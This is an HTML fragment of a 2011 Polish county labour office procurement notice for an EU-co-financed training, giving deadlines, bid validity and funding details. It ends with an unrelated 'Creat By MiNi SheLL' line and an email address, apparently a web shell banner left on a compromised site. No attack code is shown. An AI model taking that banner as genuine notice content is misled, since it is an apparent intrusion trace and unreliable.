<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 14:10, miejsce: Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie współfinansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wspieranie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie - projekt Kwalifikacje drogą do sukcesu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com